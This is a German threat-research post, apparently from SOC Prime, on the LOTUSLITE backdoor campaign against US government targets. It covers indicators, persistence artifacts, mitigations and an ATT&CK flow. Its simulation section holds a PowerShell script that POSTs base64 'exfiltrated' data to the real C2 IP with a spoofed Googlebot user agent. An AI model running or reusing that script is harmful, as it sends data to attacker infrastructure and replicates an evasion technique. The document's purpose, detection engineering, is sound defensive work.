SOC Prime Bias: Kritisch

16 Jan. 2026 16:42
newspaper icon Acronis

LOTUSLITE-Kampagne: Gezielte Spionage getrieben von geopolitischen Erzählungen

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Folgen
LOTUSLITE-Kampagne: Gezielte Spionage getrieben von geopolitischen Erzählungen
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Zusammenfassung

Acronis TRU beobachtete eine gezielte Spionageoperation gegen US-Regierungsorganisationen, die eine bösartige DLL-Hintertür lieferte, LOTUSLITE, in einem politisch thematisierten ZIP-Archiv. Eine begleitende Loader-Executable lädt die DLL nach, woraufhin die Hintertür über HTTPS zu einem fest kodierten C2-Endpunkt signalisiert, während sie einen Googlebot-User-Agent vortäuscht. Die Betreiber stellen die Persistenz her, indem sie ein dediziertes ProgramData-Verzeichnis erstellen und einen Run-Registrierungseintrag hinzufügen. Basierend auf sich überschneidender Methoden wurde die Aktivität Mustang Panda zugeschrieben.

Untersuchung

Analysten packten das ZIP aus und identifizierten die Loader-Binärdatei (Maduro to be taken to New York.exe) neben der bewaffneten DLL (kugou.dll). Die Analyse dokumentierte den DLL-Sideloading-Fluss, das Signalverhalten, die Mutex-Nutzung und die genauen auf dem Host erstellten Persistenzartefakte. Eine Infrastrukturüberprüfung ordnete die Kommunikation einer einzelnen IP (172.81.60.97) und einer spryt.net-gehosteten Domain zu, die angeblich in Phoenix, Arizona, gehostet wird. Die Zuschreibung zu Mustang Panda wurde aufgrund geteilter Taktiken und Infrastrukturmuster mit mäßigem Vertrauen bewertet.

Minderung

Acronis-Erkennungen basierten auf SHA-256-Hashes für die bösartigen Binärdateien und hoben den spezifischen ProgramData-Persistenzordner und den Speicherort des Run-Keys hervor. Netzwerkkontrollen sollten ausgehende HTTPS-Verbindungen zur identifizierten IP/Domäne kennzeichnen, wenn sie mit einer Googlebot-User-Agent-Zeichenkette gepaart sind. Reduzieren Sie die Persistenz, indem Sie die Ausführung unbekannter Binärdateien aus ProgramData verhindern und den zugehörigen Run-Registrierungseintrag bei Entdeckung entfernen.

Reaktion

Isolieren Sie sofort die betroffenen Endpunkte, erfassen Sie flüchtige Daten und bewahren Sie die bösartigen Binärdateien zur Analyse auf. Entfernen Sie den erstellten ProgramData-Ordner und löschen Sie den entsprechenden Run-Registrierungswert, um die Persistenz zu brechen. Blockieren Sie die Konnektivität zur C2-IP und Domäne und aktualisieren Sie die Endpoint-Erkennungen mit den bereitgestellten Dateihashes und dem Mutex-Indikator. Führen Sie schließlich eine umfassende Umgebungssuche nach weiteren Hosts durch, die dieselben Loader- und DLL-Signaturen aufweisen.

graph TB classDef technique fill:#ffcc99 initial_access[„<b>Technik</b> – <b>T1566.001 Spearphishing-Anhang</b><br/>Zustellung eines bösartigen ZIP-Archivs mit Loader und schädlicher DLL.“] execution[„<b>Technik</b> – <b>T1574.001 DLL-Hijacking</b><br/>Der Loader lädt <i>kugou.dll</i> als Backdoor.“] defense_evasion1[„<b>Technik</b> – <b>T1036 Tarnung</b><br/>Umbenennung in legitime Dateinamen zur Verschleierung.“] defense_evasion2[„<b>Technik</b> – <b>T1036.003 Umbenennen legitimer Tools</b>“] discovery[„<b>Technik</b> – <b>T1033 Benutzer-/Systemerkennung</b>“] command_exec[„<b>Technik</b> – <b>T1059.003 Windows-Kommandozeile</b>“] persistence[„<b>Technik</b> – <b>T1037.001 Persistenz</b>“] c2[„<b>Technik</b> – <b>T1102 Web-C2</b>“] initial_access –>|führt zu| execution execution –>|ermöglicht| defense_evasion1 defense_evasion1 –>|unterstützt| defense_evasion2 defense_evasion2 –>|liefert| discovery discovery –>|ermöglicht| command_exec command_exec –>|fördert| persistence persistence –>|etabliert| c2

Angriffsfluss

Simulationsausführung

Voraussetzung: Der Telemetrie- und Basislinien-Vorflug-Check muss bestanden sein.

Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der Gegnertechnik (TTP), die die Erkennungsregel auslösen soll. Die Befehle und die Erzählung MÜSSEN direkt die identifizierten TTPs widerspiegeln und darauf abzielen, die genaue Telemetrie zu generieren, die von der Erkennungslogik erwartet wird.

  • Angriffserzählung & Befehle:
    Der Angreifer hat eine Workstation kompromittiert und die LOTUSLITE-Hintertür installiert. Um Daten zu exfiltrieren und gleichzeitig in den legitimen webbasierten Crawler-Verkehr zu integrieren, führt die Hintertür einen HTTP POST an den fest codierten C2-Server 172.81.60.97. Sie setzt explizit den User-Agent Header auf „Googlebot“, um sich als Suchmaschinen-Crawler zu tarnen, in der Hoffnung, an Perimeter-Verteidigungen vorbeizukommen, die solche Agenten auf die Whitelist setzen. Die Nutzlast enthält Base64-codierte exfiltrierte Daten.

  • Regressionstest-Skript:

    # LOTUSLITE C2 Simulation – PowerShell
$c2 = "http://172.81.60.97/receive"
$ua = "Googlebot"
$data = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes("sensitiver Daten-Payload"))
$body = @{ "data" = $data }

try {
    Invoke-WebRequest -Uri $c2 -Method POST -Headers @{ "User-Agent" = $ua } -Body ($body | ConvertTo-Json -Compress) -UseBasicParsing
    Write-Host "C2-Anforderung erfolgreich gesendet."
} catch {
    Write-Error "C2-Anforderung fehlgeschlagen: $_"
}

  • Bereinigungskommandos:

    # Entfernen Sie alle temporären Dateien oder verbleibende Netzwerkverbindungen
Remove-Item -Path "$env:TEMPlotuslite_temp*" -ErrorAction SilentlyContinue
# (In dieser Simulation wurden keine persistenten Dienste erstellt)
Write-Host "Bereinigung abgeschlossen."

Treten Sie der Detection as Code-Plattform von SOC Prime bei um die Sichtbarkeit der für Ihr Unternehmen relevantesten Bedrohungen zu verbessern. Um Ihnen den Einstieg zu erleichtern und unmittelbaren Mehrwert zu erzielen, buchen Sie jetzt ein Treffen mit den Experten von SOC Prime.

Kostenlos beitreten